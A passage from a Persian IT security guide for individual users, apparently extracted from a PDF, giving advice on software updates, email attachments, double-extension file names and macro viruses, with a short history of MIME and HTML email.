ﺍﮔﺮ ﺩﺭ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻛﺎﺭﺑﺮﺩﻱ ﺷﻤﺎ ﺍﺷـﻜﺎﻝ ﺍﻣﻨﻴﺘـﻲ
ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻣﻬﺎﺟﻤﻴﻦ ﺍﺯ ﺁﻥ ﺍﻃﻼﻉ ﺩﺍﺭﻧـﺪ
ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺭﻭﺷﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ ﻃﺮﺍﺣـﻲ
ﻣﻲﻛﻨﻨﺪ.
ﻗﺎﻧﻮﻥ ﭼﻬﺎﺭﻡ:
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻬﻢ ﺧـﻮﺩ ﺭﺍ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻛﻨﻴﺪ.
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺍﻟﺰﺍﻣﹰﺎ ﺑﻪ ﻣﻌﻨﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﺧﺮﻳﻦ ﻧﺴﺨﻪﻫﺎ ﻧﻴﺴﺖ.
ﺑﻴﺸﺘﺮ ﺷﺮﻛﺘﻬﺎ ﻭ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ،ﺍﺷﻜﺎﻻﺕ ﺍﻣﻨﻴﺘﻲ ﻧﺴﺨﻪﻫـﺎﻱ
ﺭﺍﻳﺞ ﺭﺍ ﺑﺮﻃﺮﻑ ﻣﻲﻛﻨﻨﺪ .ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﻳﻦ ﻣـﺴﺌﻠﻪ ﺩﺭ
ﻻ ﻓﻘــﻂ ﺑــﺮﺍﻱ ﺁﺧــﺮﻳﻦ
ﻣــﻮﺭﺩ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﺭﺍﻳﮕــﺎﻥ ﻣﻌﻤــﻮ ﹰ
ﻧﺴﺨﻪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺻﺎﺩﻕ ﺍﺳﺖ .ﺍﻳﻦ ﺑـﺪﺍﻥ ﻣﻌﻨﺎﺳـﺖ ﻛـﻪ ﺍﮔـﺮ
ﻣﻲﺧﻮﺍﻫﻴﺪ ﺍﺯ ﺍﺷﻜﺎﻻﺕ ﺍﻣﻨﻴﺘﻲ ﻣﺼﻮﻥ ﺑﻤﺎﻧﻴﺪ ﺑﺎﻳﺪ ﺑﻄﻮﺭ ﻣـﻨﻈﻢ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ﻣﻮﺟﻮﺩ ﺁﻥ ﺍﺭﺗﻘﺎ ﺩﻫﻴﺪ.
ﻣﺸﻜﻞ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻭﻟﻴﻪ ﺗﻨﻬﺎ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ
ﻣﺘﻨﻬﺎﻱ ﺳﺎﺩﻩ ٦٤ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩ ﻭ ﻓﺎﻳﻠﻬﺎﻳﻲ ﭼﻮﻥ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ
ﺍﺟﺮﺍﻳﻲ ﺩﺭ ﻣﺘﻦ ﺧﻮﺩ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﻏﻴﺮﭼﺎﭘﻲ ﺩﺍﺷﺘﻨﺪ ﻛﻪ ﺩﺭ ﻣﺘﻮﻥ
ﺳﺎﺩﻩ ﻗﺎﺑﻞ ﻧﻤﺎﻳﺶ ﻧﺒﻮﺩﻧـﺪ .ﺭﺍﻩﺣـﻞ ﭘﻴـﺸﻨﻬﺎﺩﻱ ﺍﻳـﻦ ﺑـﻮﺩ ﻛـﻪ
ﺍﻃﻼﻋﺎﺕ ﻏﻴﺮﭼﺎﭘﻲ ﺑﮕﻮﻧﻪﺍﻱ ﻛﺪﮔﺬﺍﺭﻱ ﺷﻮﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻥ ﺁﻧﻬـﺎ ﺭﺍ
ﺩﺭ ﻣﺘﻮﻥ ﺳﺎﺩﻩ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭﺁﻭﺭﺩ )ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﻛﺪﮔـﺬﺍﺭﻱ
ﺩﺭ ﺿﻤﻴﻤﺔ ۱ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ( .ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ ﺑﻌـﺪ ﺍﺯ ﺩﺭﻳﺎﻓـﺖ ﭘﻴـﺎﻡ،
ﻓﺎﻳﻞ ﻛﺪﮔﺬﺍﺭﻱﺷﺪﻩ ﻛﺪﮔﺸﺎﻳﻲ ﻣﻲﮔﺮﺩﺩ ﻭ ﺑﻪ ﺷﻜﻞ ﺍﺻﻠﻲ ﺧﻮﺩ
ﺩﺭ ﻣﻲﺁﻳﺪ.
ﺑﻌﺪ ﺍﺯ ﺁﻥ ﻣﻔﻬﻮﻡ "ﺿﻤﻴﻤﻪ" ﺑﻮﺟﻮﺩ ﺁﻣﺪ ﺗﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑﺘﻮﺍﻥ
ﺵ
ﺍﻧﻮﺍﻉ ﺑﻴﺸﺘﺮﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻛﺪﮔﺬﺍﺭﻱ ﻧﻤـﻮﺩ .ﺍﻣـﺮﻭﺯﻩ ﺍﻳـﻦ ﺭﻭ ﹺ
ﺟﺪﻳﺪ ٦٥MIMEﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﺩ .ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻛـﺎﺭﺑﺮﺩ ﺿـﻤﻴﻤﻪ
ﻭﺳﻌﺖ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻛﺮﺩ ،ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻃﻮﺭﻱ
ﺗﻐﻴﻴﺮ ﻛﺮﺩﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨـﺪ ﺿـﻤﺎﻳﻢ ﺭﺍ ﺑﻄـﻮﺭ ﺧﻮﺩﻛـﺎﺭ ﺑـﺎﺯ ﻛﻨﻨـﺪ.
ﺑﻨﺎﺑﺮﺍﻳﻦ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﺓ ﭘﻴﺎﻡ ﻣﻲﺗﻮﺍﻧﺴﺖ ﺁﻧﭽﻪ ﺑﺮﺍﻱ ﻭﻱ ﻓﺮﺳﺘﺎﺩﻩ
ﺷﺪﻩ ﺍﺳﺖ ﺭﺍ ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺖ ﺍﺿﺎﻓﻪ ﻣﺸﺎﻫﺪﻩ ﻧﻤﺎﻳﺪ.
ﺩﺭ ﻫﻤﺎﻥ ﺯﻣﺎﻥ ﺷﺒﻜﻪ ﮔـﺴﺘﺮﺩﻩ ﺟﻬـﺎﻧﻲ ﻧﻴـﺰ ﻣﺮﺳـﻮﻡ ﺷـﺪ ﻭ ﺍﺯ
HTMLﺑﺮﺍﻱ ﻗﺎﻟﺐﺑﻨﺪﻱ ﺻﻔﺤﺎﺕ ﻭﺏ ﺑﻬﺮﻩ ﮔﺮﻓـﺖHTML .
ﺗﺒﺪﻳﻞ ﺑﻪ ﻳﻜﻲ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﻛﺪﮔﺬﺍﺭﻱ MIMEﺷﺪ ﻛـﻪ ﺍﻣﻜـﺎﻥ
ﻗﺎﻟﺐﺑﻨﺪﻱ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﺮﺩ )ﺗﻐﻴﻴﺮ ﻓﻮﻧﺖﻫﺎ،
ﺭﻧﮕﻬــﺎ ،ﺗــﺼﺎﻭﻳﺮ ،ﻭ ﺍﺷــﺎﺭﻩﮔﺮﻫــﺎ ﺑــﻪ ﺻــﻔﺤﺎﺕ ﻭﺏ( .ﺩﺭﺣــﺎﻝ ﺣﺎﺿــﺮ
Clear Text
Multipurpose Internet Mail Extensions
64
65
ﺑﺨﺶ ﺩﻭﻡ
ﻛﻠﻴﺎﺕ
ﺍﮔﺮ ﺗﺎﺭﻳﺨﭽﺔ ﺷـﺒﻜﻪ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨﻴـﺪ ) ۱۰ﺗـﺎ ۳۰ﺳـﺎﻝ ﮔﺬﺷـﺘﻪ(
ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺍﺯ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺗﻨﻬـﺎ ﺑـﺮﺍﻱ
ﺍﺭﺳﺎﻝ ﭘﻴﺎﻣﻬﺎﻱ ﻣﺘﻨﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﺪ .ﺍﻛﺜﺮ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻧﺪ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ
ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻠﻬﺎ ﺑﻬﺮﻩ ﻣﻲﮔﺮﻓﺘﻨﺪ .ﺭﻭﺷﻬﺎﻱ ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻞ ﺗﺎ ﺣﺪﻭﺩﻱ
ﻧﺎﻣﺄﻧﻮﺱ ﺑﻮﺩﻧﺪ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺳﺨﺖ ﺑﻮﺩ .ﺍﻟﺒﺘﻪ ﺩﺭ ﺍﻭﺍﻳﻞ ﻛﺎﺭ
ﻛﻪ ﺑﻴﺸﺘﺮ ﻛﺎﺭﺑﺮﺍﻥ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺘﺨﺼﺼﻴﻦ ﻓﻨﺎﻭﺭﻱ ﺑﻮﺩﻧﺪ
ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﭼﻨﺪﺍﻥ ﻣﻬـﻢ ﻧﺒـﻮﺩ ،ﺍﻣـﺎ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ
ﻋﻤﻮﻡ ﮔﺴﺘﺮﺩﻩﺗﺮﻱ ﻳﺎﻓﺖ ،ﺑﺎﻳـﺪ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺗﻮﺳـﻂ ﻋﻤـﻮﻡ
ﺳﺎﺩﻩﺗﺮ ﻣﻲﮔﺸﺖ.
٨٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺑﺮﻧﺎﻣﻪ ﻫـﺎﻱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺼﻮﺭﺕ ﺧﻮﺩﻛـﺎﺭ ﺩﺳـﺘﻮﺭﺍﺕ
HTMLﺩﺭﻭﻥ ﺻﻔﺤﺎﺕ ﺍﺭﺳﺎﻝﺷﺪﻩ ﺭﺍ ﻧﻴﺰ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ.
ﺗﺄﺛﻴﺮ ﺍﺭﺗﻘﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﺍﻓﺰﻭﺩﻩ ﺷﺪﻥ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ )ﺍﻣﻜﺎﻧﺎﺕ ﻗﺎﻟـﺐﺑﻨـﺪﻱ( ﺑـﻪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻛﺎﺭﺑﺮﺩ ﺁﻧﻬﺎ ﺭﺍ ﻣﻔﻴﺪﺗﺮ ﺳﺎﺧﺖ .ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ ﺁﻥ
ﭘﺲ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺍﻧﻮﺍﻉ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺑﺴﺎﺩﮔﻲ ﺗﺒﺎﺩﻝ ﻛﻨﻨﺪ .ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ
ﺍﺯ ﻓﻮﻧﺖﻫﺎ ،ﺭﻧﮕﻬﺎ ﻭ ﺗﺼﺎﻭﻳﺮ ،ﻧﺎﻣـﻪ ﺷـﻜﻞ ﻣﻄﻠـﻮﺏﺗـﺮﻱ ﭘﻴـﺪﺍ
ﻣﻲﻛﺮﺩ ﻭ ﻗﺎﻟﺐ ﺑﻨﺪﻱ ﺳﺎﺩﺓ ﺁﻥ ﺑﺪﻭﻥ ﻧﻴﺎﺯ ﺑﻪ ﺑﺮﻧﺎﻣـﺔ ﭘﺮﺩﺍﺯﺷـﮕﺮ
ﻛﻠﻤﺎﺕ ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﻓﺖ .ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ،ﺍﻳﻦ ﺍﺭﺗﻘﺎ ﺍﺑﻌﺎﺩ ﻣﻨﻔـﻲ
ﻧﻴﺰ ﺩﺭ ﭘﻲ ﺩﺍﺷﺖ.
ﻼ ﺫﻛﺮ ﺷﺪ ﺗﺎ ﻗﺒﻞ ﺍﺯ ﺍﻳﺠﺎﺩ ﺍﻳﻦ ﭘﻴﺸﺮﻓﺘﻬﺎ ﻛﺴﻲ
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻗﺒ ﹰ
ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺤـﺖ ﺗـﺄﺛﻴﺮ ﻣـﺴﺘﻘﻴﻢ ﻭﻳﺮﻭﺳـﻬﺎ ﻭ
ﻛﺮﻣﻬﺎ ﻗﺮﺍﺭ ﻧﻤﻲﮔﺮﻓﺖ .ﻫﻤﭽﻨﻴﻦ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺑﺮﻧﺎﻣﺔ ﺩﺭﻳﺎﻓﺖﺷﺪﺓ
ﻣﻮﺟﻮﺩ ﺩﺭ ﺿﻤﺎﺋﻢ ﻧﺎﻣﺔ ﺩﺭﻳﺎﻓﺘﻲ ﺭﺍ ﺍﺟﺮﺍ ﻧﻤﻲﻛﺮﺩﻳـﺪ ﺍﺯ ﺧﻄـﺮﺍﺕ
ﺍﻣﻨﻴﺘﻲ ﻣﺼﻮﻥ ﺑﻮﺩﻳـﺪ .ﺍﻛﻨـﻮﻥ ﺍﻣـﺎ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﻛـﻪ ﺩﺭﻳﺎﻓـﺖ
ﻣﻲﻛﻨﻴﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻳﻨﺪ ﻛـﻪ ﻣﻔﻬـﻮﻡ
ﺁﻥ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫـﺎ ﺧﻮﺍﻫﻨـﺪ ﺗﻮﺍﻧـﺴﺖ ﺷـﻤﺎ ﺭﺍ ﺑـﻪ
ﭘﺎﻳﮕﺎﻩ ﻭﺑـﻲ ﻫـﺪﺍﻳﺖ ﻛﻨﻨـﺪ ﻛـﻪ ﺩﺭ ﺁﻥ ﺍﻋﻤـﺎﻝ ﻣﺨﺮﺑـﻲ ﻣﺜـﻞ
downloadﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﺩ .ﻋﻼﻭﻩ ﺑﺮ
ﺍﻳﻦ ،ﺩﺳﺘﻮﺭﺍﺕ ﻭﻳﮋﺓ HTMLﻣﻲﺗﻮﺍﻧﻨـﺪ ﻣﻬـﺎﺟﻢ ﺭﺍ ﺑـﻪ ﺭﺍﻫﺒـﺮ
ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺗﺒﺪﻳﻞ ﻛﻨﻨـﺪ ﻛـﻪ ﺍﻟﺒﺘـﻪ ﭼﮕـﻮﻧﮕﻲ ﺁﻥ ﺑـﺴﺘﮕﻲ ﺑـﻪ
ﺍﺷﻜﺎﻻﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺑﺮﻧﺎﻣـﺔ ﻣﻔـﺴﺮ ﺩﺳـﺘﻮﺭﺍﺕ HTMLﺭﺍﻳﺎﻧـﺔ
ﺷﻤﺎ ﺩﺍﺭﺩ.
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﮔﻤﺮﺍﻩﻛﻨﻨﺪﻩ ﺍﺳﺖ
ﻗﺎﻧﻮﻥ ﭘﻨﺠﻢ:
ﺑﺮﻧﺎﻣﺔ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ
ﻧﻤﺎﻳﻴﺪ ﻛﻪ ﺿﻤﺎﺋﻢ ﺭﺍ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺑﺎﺯ ﻧﻜﻨﺪ.
ﻫﺮ ﻓﺮﺩﻱ ﻛﻪ ﺁﺩﺭﺱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻤﺎ ﺭﺍ ﺑﺪﺍﻧﺪ ﻳـﺎ ﺑﺘﻮﺍﻧـﺪ
ﺁﻧﺮﺍ ﺣﺪﺱ ﺑﺰﻧﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻧﺎﻣﺔ ﺣﺎﻭﻱ ﺿﻤﻴﻤﻪ ﺍﺭﺳـﺎﻝ
ﻛﻨﺪ .ﺍﻳﻦ ﺿﻤﻴﻤﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣﻔﻴـﺪ ﻭ ﻗﺎﺑـﻞ ﺍﺳـﺘﻔﺎﺩﻩ ﻭ ﻳـﺎ
ﻭﻳﺮﻭﺱ ،ﻛﺮﻡ ،ﻳﺎ ﺗﺮﺍﻭﺍﻳﻲ ﺑﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺁﺳـﻴﺒﻬﺎﻱ ﺟـﺪﻱ ﺑـﻪ
ﺳﻴــﺴﺘﻢ ﺷــﻤﺎ ﻭﺍﺭﺩ ﻧﻤﺎﻳــﺪ .ﺍﻛﺜــﺮ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﺟﺪﻳــﺪ ﭘــﺴﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺿﻤﺎﻳﻢ ﺭﺍ ﻗﺒﻞ ﺍﺯ ﺍﺟﺎﺯﺓ ﺷﻤﺎ ﺑﺎﺯ ﻧﻤﻲﻛﻨﻨﺪ ،ﺍﻣﺎ ﺍﮔـﺮ
ﺑﺮﻧﺎﻣﺔ ﺷﻤﺎ ﺑﮕﻮﻧﻪﺍﻱ ﺑﺎﺷﺪ ﻛﻪ ﺁﻧﺮﺍ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺑـﺎﺯ ﻧﻤﺎﻳـﺪ،
ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﻴﺪ ﺍﻳﻦ ﮔﺰﻳﻨﻪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ.
ﻗﺎﻧﻮﻥ ﺷﺸﻢ:
ﻗﺒﻞ ﺍﺯ ﺑﺎﺯ ﻛﺮﺩﻥ ﻫﺮ ﺿﻤﻴﻤﻪ ﺑﻪ ﻧﺎﻡ ﺁﻥ ﺩﻗﺖ ﻛﻨﻴﺪ ﺗﺎ
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺍﺟﺮﺍﻳﻲ ﻧﻴﺴﺖ.
ﻻ ﺿـﻤﺎﻳﻢ
ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻭﻳﺮﻭﺱ ﺑﺴﻴﺎﺭ ﺯﻳﺮﻙ ﻫﺴﺘﻨﺪ .ﺁﻧﻬﺎ ﻣﻌﻤﻮ ﹰ
ﺭﺍ ﺑــﺎ ﻧﺎﻣﻬــﺎﻳﻲ ﭼــﻮﻥ budget.xls.vbsﺍﺭﺳــﺎﻝ ﻣــﻲﻛﻨﻨــﺪ.
ﻧﺎﻇﺮﻱ ﻛﻪ ﻧﻤﻲ ﺩﺍﻧﺪ vbsﭼﻴﺴﺖ ﺗﺼﻮﺭ ﻣـﻲﻛﻨـﺪ ﻳـﻚ ﻓﺎﻳـﻞ
Excelﺑــﺎ ﻧــﺎﻡ budgetﺍﺯ ﺳــﻮﻱ ﻣﺎﻳﻜﺮﻭﺳــﺎﻓﺖ ﺑــﺮﺍﻱ ﻭﻱ
ﺍﺭﺳﺎﻝ ﺷﺪﻩ )ﺧﺼﻮﺻﹰﺎ ﺩﺭ ﺣﺎﻟﺘﻲ ﺍﺯ ﺗﻨﻈﻴﻤﺎﺕ ﻛﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﭘﺴﻮﻧﺪﻫﺎﻱ
ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﺭﺍ ﺑﻪ ﻛﺎﺭﺑﺮ ﻧﻤﺎﻳﺶ ﻧﻤﻲﺩﻫﺪ(؛ ﺍﻣﺎ ﺍﻳـﻦ ﻓﺎﻳـﻞ ﺩﺭ ﺣﻘﻴﻘـﺖ
ﻳــﻚ ﺑﺮﻧﺎﻣــﺔ ﺍﺟﺮﺍﻳــﻲ Visual Basicﺍﺳــﺖ ﻛــﻪ ﻧــﺎﻡ ﺁﻥ
budget.xlsﻣﻲﺑﺎﺷﺪ xls :ﺗﻨﻬﺎ ﺑﺨﺸﻲ ﺍﺯ ﻧﺎﻡ ﺍﻳﻦ ﻓﺎﻳﻞ ﺍﺳﺖ
ﻭ ﻫﻴﭻ ﺍﺭﺗﺒﺎﻃﻲ ﺑﺎ Excelﻧﺪﺍﺭﺩ .ﺩﺭ ﺑﺪﺗﺮﻳﻦ ﺣﺎﻻﺕ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﺪ ﺗﻤﺎﻣﻲ ﺩﻳﺴﻚ ﺳﺨﺖ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺭﺍ ﭘـﺎﻙ
ﻧﻤﺎﻳﺪ.
ﺩﺭ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﻗــﻊ ﺁﺩﺭﺱ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﻛــﻪ ﺟﻠــﻮﻱ
ﻋﺒﺎﺭﺕ "ﻓﺮﺳﺘﻨﺪﻩ" ﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﺩ ﻣﻌﺘﺒﺮ ﻧﻴﺴﺖ .ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻲ ﺍﺳﺖ
ﻛﻪ ﻫﺮﺯﻧﺎﻣﻪﻧﻮﻳﺲﻫﺎ ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺷـﻤﺎ
ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﮔﺮ ﻛﻞ ﺳﺮﺁﻳﻨﺪ ٦٦ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴـﺪ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﻴﺪ ﻣﺘﻮﺟﻪ ﺷﻮﻳﺪ ﻛﻪ ﺍﻳﻦ ﻧﺎﻣﻪ ﻭﺍﻗﻌﹰﺎ ﺍﺯ ﻛﺠﺎ ﻭ ﺍﺯ
ﺳﻮﻱ ﭼﻪ ﻛﺴﻲ ﺍﺭﺳﺎﻝ ﺷﺪﻩ ﺍﺳﺖ.
ﻫﺮﮔﺰ ﺿﻤﻴﻤﻪ ﺍﻱ ﺭﺍ ﻛـﻪ ﺍﺯ ﺟﺎﻧـﺐ ﺍﻓـﺮﺍﺩ ﻧﺎﺷـﻨﺎﺱ
ﺑﺮﺍﻳﺘﺎﻥ ﺍﺭﺳﺎﻝ ﺷﺪﻩ ﺍﺳﺖ ﺑﺎﺯ ﻧﻜﻨﻴـﺪ؛ ﻣﮕـﺮ ﺍﻳﻨﻜـﻪ
ﺍﻃﻤﻴﻨﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺁﻥ ﻧﻮﻉ ﻓﺎﻳﻞ ﻧﻤـﻲﺗﻮﺍﻧـﺪ
ﺣﺎﻭﻱ ﻛﺪ ﻣﺨﺮﺏ ﺑﺎﺷﺪ.
ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺧﻮﺩ ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳﻴﺪ؟
ﺑﻪ ﺧﺎﻃﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺑﺮﻧﺎﻣﻪﻫـﺎﻳﻲ ﻣﺜـﻞ Microsoft Word
Header
66
ﻗﺎﻧﻮﻥ ﻫﻔﺘﻢ:
)ﭘﺮﺩﺍﺯﺷﮕﺮ ﻛﻠﻤﺎﺕ( ﻭ ) Microsoft Excelﺻﻔﺤﻪ ﮔـﺴﺘﺮﺩﺓ ﺩﺍﺩﻩ( ﻭ
ﺗﻤﺎﻣﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣـﺸﺎﺑﻪ ،ﺩﺍﺭﺍﻱ ﻗﺎﺑﻠﻴـﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ Macro
ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺣﺎﻭﻱ ﻭﻳﺮﻭﺱ ﺑﺎﺷﺪ .ﺣﺘﻲ ﻓﺎﻳﻠﻬﺎﻱ PDF
ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺣﺎﻭﻱ ﻗﻄﻌﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺮﺏ ﺑﺎﺷﻨﺪ )ﺍﮔﺮﭼﻪ ﺍﻳـﻦ
٨١
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﻓﺎﻳﻠﻬﺎ ﺗﻨﻬﺎ ﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺧﻄﺮﻧـﺎﻙ ﺑﺎﺷـﻨﺪ ﻛـﻪ ﺑـﺎ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﻛـﺎﺭﺑﺮﺩﻱ
Adobe Acrobat Professionalﺑــﺎﺯ ﺷــﻮﻧﺪ ﻭ ﺑــﺎﺯﻛﺮﺩﻥ ﺁﻧﻬــﺎ ﺑــﺎ
